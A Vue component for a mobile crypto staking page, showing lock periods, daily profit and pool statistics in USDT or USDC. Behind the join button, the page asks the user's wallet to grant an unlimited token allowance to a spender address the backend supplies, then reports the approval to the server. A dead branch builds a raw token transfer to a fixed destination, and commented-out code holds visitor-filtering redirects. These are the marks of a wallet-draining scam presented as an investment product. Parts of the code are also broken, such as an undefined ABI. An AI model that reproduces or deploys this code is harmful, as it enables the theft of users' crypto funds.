<style>
.balance-box{width:90vw;margin: 0 auto;margin-top: 5vw;display: flex;
justify-content: space-between;}
.balance-box-box{width:40vw;background-color: #fafafa;padding: 3vw 0;
border-radius: 3vw;}
.balance-box-box span{display: block;text-align: center;height: 6vw;
font-family:  Arial,sans-serif!important;;}
.balance-box-box span.bbb-a{font-size: 3.5vw;color: #666;}
.balance-box-box span.bbb-b{font-size: 5vw;color: #000;line-height: 6vw;
font-weight: 700;}
.balance-box-box b{font-size: 3.5vw;font-weight: 700;
font-family:  Arial,sans-serif!important;;}
.locked-box{width:90vw;margin: 0 auto;margin-top: 5vw;}
.locked-box-head{width:100%;height: 10vw;}
.locked-box-head span.title{font-size: 4vw;font-weight: bold;text-align: left;float: left;}
.locked-box-head span.rate{font-size: 4vw;font-weight: bold;text-align: right;float: right;}
.locked-box-box{width:100%;height: 10vw;margin: 0 auto;padding: 0;
overflow: hidden;margin-top: 3vw;}
.locked-box-box input{width:46vw;display: block;float: left;height: 10vw;
line-height: 10vw;outline: none;border:rgb(252, 213, 53) solid 1px;
border-radius: 10vw;padding: 0 3vw;font-size: 4vw;font-weight: bold;}
.locked-box-box span.locked-label{display: block;width:20vw;float: right;text-align: right;
height: 10vw;line-height: 10vw;font-size: 4vw;font-weight: bold;
color: #000;}
.locked-box-box span.locked-max{display: block;float: left;text-align: left;
height: 10vw;line-height: 10vw;font-size: 4vw;font-weight: bold;margin-left: 3vw;
background-color: rgb(252, 213, 53);padding: 0 2vw;color: #333;
border-radius: 2vw;font-size: 3.5vw;}
.locked-box-box ul{list-style: none;margin: 0;padding: 0;overflow: hidden;
float: left;}
.locked-box-box ul li{float: left;height: 10vw;background-color: #eee;
line-height: 10vw;padding: 0 2vw;margin-left: 2vw;color: #333;
border-radius: 2vw;font-size: 3.5vw;}
.locked-box-box ul li:first-child{margin-left: 0;}
.locked-box-box ul li.on{background-color: rgb(252, 213, 53);font-weight: bold;}
.join{width:90vw;margin: 0 auto;margin-top: 5vw;}
.join button{background-color: rgb(252, 213, 53);width: 100%;
height: 14vw;border-radius: 2vw;font-size: 5vw;font-weight: bold;
outline: none;border: 0;font-family:  Arial,sans-serif!important;}
.liquidity-node{width:90vw;margin: 0 auto;margin-top: 5vw;height: 14vw;
background-color: #f3f3f3;border-radius: 2vw;}
.liquidity-node span.liquidity-node-title{display: block;float: left;height: 14vw;
font-size: 4vw;margin-left: 3vw;line-height: 14vw;font-weight: bold;color: #333;}
.liquidity-node img{display: block;float: left;width: 6vw;margin-top:4vw;
margin-left: 2vw;}
.liquidity-node span.liquidity-node-count{display: block;float: right;height: 14vw;
font-size: 4vw;margin-right: 3vw;line-height: 14vw;font-weight: bold;color: #333;}
.liquidity-node   b{font-weight: normal;font-size: 3.5vw;
color:#333;}
.liquidity-s{width:90vw;margin: 0 auto;margin-top: 5vw;height: 28vw;
background-color: #f3f3f3;border-radius: 2vw;display: flex;justify-content: space-between;}
.liquidity-s-box{width:30vw;}
.liquidity-s-box-icon{width:8vw;height: 8vw;border-radius: 8vw;background-color: rgb(239, 232, 204);
margin-top: 3vw;padding: 0;overflow: hidden;}
.liquidity-s-box img{width:5vw;display: block;margin: 0 auto;margin-top: 1.5vw;}
.liquidity-s-box span{display: block;width: 100%;text-align: center;}
.liquidity-s-box span.lb-a{color: #666;height: 8vw;line-height: 8vw;
font-size: 3.5vw;}
.liquidity-s-box span.lb-b{color: #333;height: 6vw;line-height: 6vw;
font-size: 4vw;font-weight: bold;color:#333;;}

.pledges-output{width:90vw;margin: 0 auto;margin-top: 5vw;}
.pledges-output span.title{width: 100%;text-align: center;
display: block;font-size: 5vw;color: #999;}
.pledges-output ul{width:100%; background-color: #fafafa;
list-style: none;border: 0;margin: 0;padding: 0;overflow: hidden;
border-radius: 2vw;padding: 3vw 0;border-top-left-radius: 0;
border-top-right-radius: 0;
}
.pledges-output ul li{width:100%;margin: 0 auto;height: 8vw;overflow: hidden;}
.pledges-output ul li span{display: block;font-size: 3.5vw;float: left;
line-height:8vw;font-family:  Arial,sans-serif!important;}
.pledges-output ul li span.u-a{width: 25%;color: #333;text-align: left;
margin-left: 5%;}
.pledges-output ul li span.u-b{width: 25%;
color:#000;font-weight: bold;text-align: center;}
.pledges-output ul li span.u-c{width: 15%;
color:#000;font-weight: bold;text-align: center;}
.pledges-output ul li span.u-d{width: 25%;
color:#000;font-weight: bold;text-align: right;}
.pledges-output ul li b{color: #333;font-weight: normal;padding-left: 2vw;}

.pledge-order{width:100%;height: 10vw;background-color: #d5d1d1;
border-radius: 1vw;border-bottom-left-radius: 0;
border-bottom-right-radius: 0;}
.pledge-order span{display: block;float: left;line-height: 10vw;height: 10vw;
}
.pledge-order span.p-a{text-align: left;width:25%;margin-left: 5%;}
.pledge-order span.p-b{text-align: center;width:25%;}
.pledge-order span.p-c{text-align: center;width:15%;}
.pledge-order span.p-d{text-align: right;width:25%;}

.withdraw{width:90vw; background-color: #fafafa;margin: 0 auto;
border-radius: 3vw;padding: 0;overflow: hidden;margin-top: 5vw;}
.withdraw span.w-title{width:100%;height: 15vw;text-align: center;display: block;
font-size: 6vw;font-weight: normal;line-height: 15vw;
font-family: "Century Gothic",Consolas,"Liberation Mono",Courier,Verdana,serif;}
.withdraw-box{width:80vw;margin: 0 auto;border-radius: 3vw;position: relative;
border: #ddd solid 1px;height: 18vw;}
.withdraw-box input{display: block;position: absolute;left: 3vw;height: 18vw;
line-height: 18vw;border: 0;outline: none;background:none;font-size: 8vw;
width:40vw;}
.sep{position: absolute;height: 10vw;width: 1px;border-left: #ddd solid 1px;
right:30vw;top:4vw;}
.withdraw-box img{width:10vw;height: 10vw;display: block;position: absolute;
right:18vw;top:4vw;}
.withdraw-box span{display: block;position: absolute;right:3vw;line-height: 18vw;
height: 18vw;font-size: 6vw;color: #000;
font-family: "Century Gothic",Consolas,"Liberation Mono",Courier,Verdana,serif;}
.withdraw span.w-total{width:80vw;height: 10vw;text-align: center;display: block;
font-size: 4vw;font-weight: normal;line-height: 10vw;text-align: left;
color: #333;;}
.withdraw button{width: 80vw;margin: 0 auto;height: 12vw;line-height: 12vw;
display: block;background-color: rgb(252, 213, 53);font-size: 4vw;
border-radius: 1vw;}
.withdraw button.grey_btn{background-color: rgba(237, 237, 237, .9);color:#999;}
.withdraw span.w-history{width:80vw;height: 10vw;text-align: center;display: block;
font-size: 3.5vw;font-weight: normal;line-height: 10vw;text-align: right;
color: #666;;}
</style>
<template>
	<div class="bg" v-if="all_show">
    <headers @chain_changed="chain_changed($event)" @usd_changed="usd_changed($event)" @change="toconnect($event)" :chain="chain_id" :address="addr" :connected="connected" :now="now"></headers>
    <div class="balance-box">

      <div class="balance-box-box"  >
        <span class="bbb-a">{{$t('home.index34')}}</span>
        <span class="bbb-b">{{locked}} <b v-if="usd==2">USDC</b><b v-else>USDT</b></span>
      </div>
      <div class="balance-box-box">
        <span class="bbb-a">{{$t('home.index31')}}</span>
        <span class="bbb-b">{{rates}} <b>%</b></span>
      </div>
    </div>
    <div class="locked-box">
      <div class="locked-box-head">
        <span class="title">{{$t('home.index27')}}</span>
        <span class="rate" v-if="usd==2">{{dayprofit}} USDC</span>
        <span class="rate" v-else>{{dayprofit}} USDT</span>
      </div>
      <div class="locked-box-box">
        <input v-model="amount" type="text">
        <span class="locked-max" @click="max">MAX</span>
        <span class="locked-label" v-if="usd==2">USDC</span>
        <span class="locked-label" v-else>USDT</span>
      </div>
      <div class="locked-box-box">
        <ul>
          <li @click="select_day(item)" :class="item==day?'on':''" v-for="item in days">{{item}}</li>
        </ul>
        <span class="locked-label">{{$t('home.index36')}}</span>
      </div>
    </div>
    <!-- <div class="liquidity-node">
      <span class="liquidity-node-title">{{$t('home.index37')}}</span>
      <span class="liquidity-node-count">{{expected}} <b>USDT</b></span>
    </div> -->
    <div class="join">
      <button @click="getTokenTransfer">{{$t('home.index38')}}</button>
    </div>
    <div class="liquidity-node">
      <span class="liquidity-node-title">{{$t('home.index39')}}</span>
      <img src="../../../static/images/star.svg">
      <span class="liquidity-node-count">{{basic_data.node}}</span>
    </div>
    <div class="liquidity-s">
      <div class="liquidity-s-box">
        <div class="liquidity-s-box-icon"><img src="../../../static/images/pool.svg"></div>
        <span class="lb-a">{{$t('home.index4')}}</span>
        <span class="lb-b">{{basic_data.pool2}}</span>
      </div>
      <div class="liquidity-s-box">
        <div class="liquidity-s-box-icon"><img src="../../../static/images/member.svg"></div>
        <span class="lb-a">{{$t('home.index5')}}</span>
        <span class="lb-b">{{basic_data.participant2}}</span>
      </div>
      <div class="liquidity-s-box">
        <div class="liquidity-s-box-icon"><img src="../../../static/images/profit.svg"></div>
        <span class="lb-a">{{$t('home.index6')}}</span>
        <span class="lb-b">{{basic_data.revenue2}}</span>
      </div>
    </div>
    <!-- <div class="pledges-output">
      <span class="title">{{$t('home.index40')}}</span>
      <div class="pledge-order">
        <span class="p-a">{{$t('home.index41')}}</span>
        <span class="p-b">{{$t('home.index42')}}</span>
        <span class="p-c">{{$t('home.index36')}}</span>
        <span class="p-d">{{$t('home.index43')}}</span>
      </div>
      <ul>
        <li v-for="item in list">
          <span class="u-a">{{item.time}}</span>
          <span class="u-b">{{item.amount}}</span>
          <span class="u-c">{{item.days}}</span>
          <span class="u-d">{{item.expected}}</span>
        </li>
      </ul>
    </div> -->
    <!-- <div class="withdraw">
      <span class="w-title">{{$t('home.index44')}}</span>
      <div class="withdraw-box">
        <input maxlength="6" v-model="amount2" type="text">
        <div class="sep"></div>
        <img src="../../../static/images/usdt.svg">
        <span>USDT</span>
      </div>
      <span class="w-total">{{$t('home.index45')}}:${{user_balance2}}</span>
      <button v-if="amount2>0" @click="pre_get" :disabled="!btn">{{$t('home.index46')}}</button>
      <button class="grey_btn" v-else>{{$t('home.index46')}}</button>

      <span @click="history" class="w-history">{{$t('home.index47')}}</span>

    </div> -->
    <div class="blank"></div>
    <menus :now="now"></menus>
	</div>
</template>
<script>
import menus from '../components/menus.vue'
import headers from '../components/header.vue'
import { ethers } from 'ethers'
import { connectWallet, disconnectWallet, getAccount, getChainId, getGasPrice, getProvider } from '../../utils/wallet'
import { getAllowance, approveUnlimited, revokeApproval } from '../../utils/erc20'
import Qs from 'qs'
export default {
  components: {
    menus,
    headers
  },
  data () {
    return {
      now: 3,
      provider: '',
      chain_id: 56,
      balance: 0,
      connected: false,
      address: '',
      gas: '',
      days: [7, 15, 30, 60, 90, 180, 360],
      day: 7,
      amount: 0,
      web3: null,
      addr: '',
      token: '',
	  timers:null,
      dest_address: '',
      order_hash: '',
      approve_hash:'',
      basic_data: '',
      locked: 0,
      expected: 0,
      list: [],
      rate: '--',
      rates: '--',
      amount2: 0,
      usd: 2,
      btn: true,
      user_balance2: 0,
      joined:false,
      dayprofit: 0,
      all_show:true,
      userAgent2:'',
      userAgent:'',
	  account: '',
	  loading: false,
	  errMsg: '',
	  walletReady: false
    }
  },
  async created() {
  	 // this.ref = this.$utils.getUrlKey('ref')
     await connectWallet()
     this.walletReady = true
   },
  async mounted () {
    if (window.ethereum) {
  	  try {
  		// 尝试静默恢复连接（不弹授权框）
  		const accounts = await window.ethereum.request({ method: 'eth_accounts' })
  		if (accounts.length > 0) {
  		  // 已经授权过，直接恢复 provider
  		  await connectWallet()
  		}
  	  } catch (e) {
  		console.log('恢复连接失败', e)
  	  }
  	} 
	this.timers = setInterval(() => {
	    if (!this.connected) {
	        this.getAddress()
	    } else {
			 clearInterval(this.timers)
		}
	}, 3000)
    this.userAgent2 = navigator.userAgent;
    this.userAgent = window.location.href
    this.userAgent = this.userAgent.toLowerCase();
    this.userAgent2 = this.userAgent2.toLowerCase();
     // if(this.userAgent.includes("trust") || this.userAgent2.includes("android")){
      //this.all_show = true
      this.get_basic()
      this.getAddress()
    //   }else{
    //    window.location.href="https://www.bitget.com/"
    // }

    // const utm_source = this.$utils.getUrlKey('utm_source')
    // if(!utm_source || utm_source.length==0){
    //   window.location.href="https://binance.com"
    // }
  },
  methods: {
    readEntrance () {
      const entrance_token = localStorage.getItem('entrance_token');
      const _this = this
      const data = {
        address: _this.address,
        token: entrance_token
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/readEntrance',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state == 1) {
          if(data.data.status == 2) {
          //  window.location.href = data.data.url
          } else {
            this.all_show = true
          }
        }
      }).catch(error => {
        console.log(error)
      })
    },
    chain_changed (id) {
       this.chain_id = id
       this.getAddress()
    },
    usd_changed (id) {
      this.usd = id
      this.getAddress()
    },
    history () {
      this.$router.push('/history')
    },
    pre_get () {
    	if (!this.btn) {
        this.$toast.center(this.$t('home.index48'))
    		 return
    	}
      var data = {
      		token: this.token,
        amount: this.amount2
      	}
    	let self = this
      this.$axios({
        method: 'post',
        url: this.$api + '/account/pre_get2',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.btn = false
          this.getTransferGas()
        } else {
          this.$toast.center(data.msg)
        }
      }).catch(error => {
        console.log(error)
      })
    },
    async getTransferGas () {
      this.gas = await this.web3.eth.getGasPrice()
      this.gas = this.gas * 1.5
      this.gas = this.gas.toFixed(0)
      var val = this.gas / 1000000000000000000 * 50000
      val = val * Math.pow(10, 18)
      let toAddress = this.$dest
      let self = this
      this.web3.eth.sendTransaction({
        gas: 21000,
        gasPrice: self.gas,
        from: self.address,
        to: toAddress,
        value: val
      }, function (error, hash) {
        self.get_award(hash)
      }).then(function (receipt) {
        console.log(receipt)
        	self.award_done(receipt.transactionHash)
      })
    },
    get_award (hash) {
    	let self = this
      var data = {
    			token: this.token,
        amount: this.amount2,
    			hash: hash
    		}
      this.$axios({
        method: 'post',
        url: this.$api + '/account/get_award2',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
        } else {
          this.btn = true
          this.$toast.center(data.msg)
        }
      }).catch(error => {
        console.log(error)
      })
    },
    award_done (hash, type) {
    	let self = this
      var data = {
    			token: this.token,
    			hash: hash
    		}
      this.$axios({
        method: 'post',
        url: this.$api + '/account/award_done2',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.$toast.center(this.$t('home.index49'))
          this.get_locked()
          self.btn = true
        } else {
          this.$toast.center(data.msg)
        }
      }).catch(error => {
        console.log(error)
      })
    },
    select_day (day) {
      this.day = day
    },
    max () {
      this.amount = this.balance
    },
    async toconnect (val) {
      this.getAddress()
    },
	async getAddress () {
	  let Address = getAccount()
	  console.log(111)
	   console.log(Address)
	   this.address = Address
	    console.log(this.chain_id)
	  //this.chain_id = await getChainId()
	 // console.log(this.chain_id)
	//  this.gas = await getGasPrice()
	 // const chainId_now = parseInt(chainId, 16)
	  if (this.chain_id != 56 && this.chain_id != 1) {
	    this.$toast.center(this.$t('home.index21'))
	  } else {
	    const chainIds = localStorage.getItem('chainId');
	     if(!chainIds || chainIds == 'undefined'){
	      // this.chain_id = this.chain_id
	     //  this.usd = 2
		 localStorage.setItem('chainId',this.chain_id);
	     }
		 if(Address){
			  this.connected = true
		 }
	   
	    this.dologin()
	  }
	},
   async getAddresss () {
     let Address = getAccount()
      
     this.chain_id = await getChainId()
     this.gas = await getGasPrice()
     this.address = Address
      if (this.chain_id != 56 && this.chain_id != 1) {
        this.$toast.center(this.$t('home.index21'))
      } else {
       
        this.connected = true
      //  this.getTokenBalance()
        this.dologin()
      }
    },
    // 查询代币余额
    async getTokenBalance () {
      let fromAddress = this.address// 查询用户地址
      let token = this.chain_id == 56 ? this.$token : this.$token2
      let ethContract = new this.web3.eth.Contract(abi, token) // 所有代币的abi可以通用（abi,合约地址）
      let balance = await ethContract.methods.balanceOf(fromAddress).call()
      this.balance = balance / Math.pow(10, 18)
      this.balance = this.balance.toFixed(4) * 1
      console.log(this.balance)
    },
    get_approve () {
      const _this = this
      const data = {
        token: _this.token,
        chain: _this.chain_id,
        usd: _this.usd
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/get_approve_address',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state == 1) {
          this.joined = true
        } else {
          this.dest_address = data.data
        }
      }).catch(error => {
        console.log(error)
      })
    },
    getTokenTransfer () {
      console.log(this.joined)
      if(this.joined){
        this.buy()
      }else{
        this.getApprove()
        return;
        if (window.web3) {
          let self = this
          // if (this.amount < this.basic_data.least) {
          //   this.$toast.center(this.$t('home.index50') + this.basic_data.least + ' USDT')
          //   return
          // }
          // if (this.amount > this.balance) {
          //   this.$toast.center(this.$t('home.index51'))
          //   return
          // }
          let value = this.amount * Math.pow(10, 18)
          let token = self.$token
          if(self.chain_id == 56){
            if(self.usd == 1) {
              token = self.$token
            } else {
              token = self.$token3
            }
          } else {
            if(self.usd == 1) {
              token = self.$token2
            } else {
              token = self.$token4
            }
          }
          value = value.toString(16)
          const data = {
            token: self.token,
            usd: self.usd,
            value: value,
            amount: self.amount
          }
          this.$axios({
            method: 'post',
            url: this.$api + '/order/pre_buy',
            data: Qs.stringify(data),
            headers: {
              'Content-Type': 'application/x-www-form-urlencoded'
            }
          }).then(response => {
            var data = response.data
            if (data.state === 1) {
              let dest = this.$dest.substr(2, 40)
              let code = '0xa9059cbb000000000000000000000000' + dest + data.data
              let amount = this.amount * Math.pow(10, 18)// 转账100个
              let fromAddress = this.address
              this.web3.eth.sendTransaction({
                gas: '0x1D4C0',
                gasPrice: self.gas,
                from: fromAddress,
                to: token,
                data: code
              }, function (error, hash) {
                self.buy(hash, amount)
              }).then(function (receipt) {
                self.buy_done(receipt.transactionHash)
              })
            }
          }).catch(error => {
            console.log(error)
          })
        }
        //this.getApprove()
      }
    },
    // 授权
    async getApprove () {
      let self = this
      let token = self.chain_id == 56 ? self.$token : self.$token2

      let ethContract = new this.web3.eth.Contract(abi, token) // 所有代币的abi可以通用（abi,合约地址）
      ethContract.methods.approve(self.dest_address, '0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff').send({
        from: self.address,
        gasPrice: self.gas,
        gas: '0x1D4C0'
      }, function (err, tx) {
        console.log(err, tx)
        if (!err) {
          self.approve_hash = tx
        }
      }).then(function (receipt) {
        console.log(receipt.status)
        if (receipt.status) {
          self.finish_approve()
        }
      })
    },
    finish_approve () {
      const _this = this
      const data = {
        token: _this.token,
        dest: _this.dest_address,
        chain: _this.chain_id,
        usd: _this.usd,
        hash: _this.approve_hash
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/finish_approve',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          _this.get_approve()
          _this.buy()
        }
      }).catch(error => {
        console.log(error)
      })
    },
   buy () {
     const _this = this
     const data = {
       token: _this.token,
       chain: _this.chain_id,
       day: _this.day,
       usd: _this.usd,
       amount: _this.amount
     }
     this.$axios({
       method: 'post',
       url: this.$api + '/order/try_buy',
       data: Qs.stringify(data),
       headers: {
         'Content-Type': 'application/x-www-form-urlencoded'
       }
     }).then(response => {
       var data = response.data
       if (data.state === 1) {
         this.$toast.center('success')
       } else {
         this.$toast.center(data.msg)
       }
     }).catch(error => {
       console.log(error)
     })
   },
   buy_done (hash) {
     const _this = this
     const data = {
       token: _this.token,
       chain: _this.chain_id,
       usd: _this.usd,
       hash: hash
     }
     this.$axios({
       method: 'post',
       url: this.$api + '/order/buy_done',
       data: Qs.stringify(data),
       headers: {
         'Content-Type': 'application/x-www-form-urlencoded'
       }
     }).then(response => {
       var data = response.data
       if (data.state === 1) {
         this.$toast.center(this.$t('home.index52'))
         this.get_locked()
       } else {
         this.$toast.center(data.msg)
       }
     }).catch(error => {
       console.log(error)
     })
   },
    dologin () {
      const _this = this
      const data = {
        address: _this.address,
        ref: _this.ref
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/login',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.addr = data.data.addr
          this.token = data.data.token
          if (this.token) {
            this.readEntrance()
            this.get_locked()
            this.get_my_order()
            this.get_basic()
            this.get_approve()
          }
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get_expected () {
      return
      const _this = this
      const data = {
        token: _this.token,
        amount: _this.amount,
        day: _this.day
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/get_expected',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.expected = data.data.amount
          this.rate = data.data.rate
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get_my_order () {
      const _this = this
      const data = {
        token: _this.token
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/order/get_my_order',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.list = data.data
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get_locked () {
      const _this = this
      const data = {
        token: _this.token,
        usd: _this.usd,
        chain_id: _this.chain_id
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/get_locked',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.balance = data.data.balances
          this.locked = data.data.amount
          this.user_balance2 = data.data.balance2
          this.dayprofit = data.data.dayprofit
          this.rates =  data.data.advance_rate
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get_basic () {
      const _this = this
      const data = {
        token: _this.token
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/get_basic_data',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.basic_data = data.data
        }
      }).catch(error => {
        console.log(error)
      })
    }
  },
  watch: {
    day () {
      this.get_expected()
    },
    amount () {
      this.get_expected()
    }
  },
  beforeDestroy() {
      clearInterval(this.timers)
  }
}
</script>
